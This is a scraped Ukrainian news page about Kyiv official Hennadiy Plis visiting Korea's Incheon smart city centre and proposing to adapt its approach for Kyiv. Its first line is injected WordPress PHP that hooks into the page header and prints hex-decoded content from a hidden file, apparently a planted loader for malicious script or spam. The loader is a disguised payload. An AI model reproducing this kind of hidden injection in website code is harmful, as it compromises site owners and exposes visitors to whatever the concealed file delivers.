if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Корея допоможе створити розумні простори у Києві

Корея допоможе створити розумні простори у Києві

Київ має орієнтуватися на найкращі смарт-центри світу для того, щоб створити справді якісну та дієву структуру. Про це під час відвідання вільної економічної зони Інчон та IFEZ Promotion Center і Smart City Operation Center (Корея) заявив перший заступник голови КМДА Геннадій Пліс.

«Сьогодні ми побачили надзвичайно цікавий центр, центр справді розумного міста, осередок народження ефективних рішень для сучасних мегаполісів. Ті підходи, ті будівельні й технологічні проекти, які працюють у Кореї, можна сміливо брати за основу в Києві. І ми готові не просто вивчати цей досвід – ми хочемо адаптувати його до наших реалій», – підкреслив перший заступник голови КМДА.

За його словами, у столиці України активно вивчається питання про створення бізнес-гавані, смарт-центру, а також розумного кварталу Living Lab.

«Усі ті кроки, які робить міська влада вже сьогодні, наближають Київ до статусу SmartCity. Однак є багато того, що потрібно зробити, щоб воно справді стало таким. Ми відкрили бюджет міста та впроваджуємо Бюджет участі, та наступним, сподіваюсь, покладемо початок бізнес-осередку як комфортному місцю для життя та праці. Я впевнений, що разом із розумними містянами ми зробимо це», – підкреслив Геннадій Пліс.

Залишити відповідь

Ваша e-mail адреса не оприлюднюватиметься. Обов’язкові поля позначені *

Статистика сторінки:
Переглядів сьогодні:
Переглядів у поточному місяці:
Відповідальність за зміст коментарів, що залишають відвідувачі, несуть їхні автори.
Популярне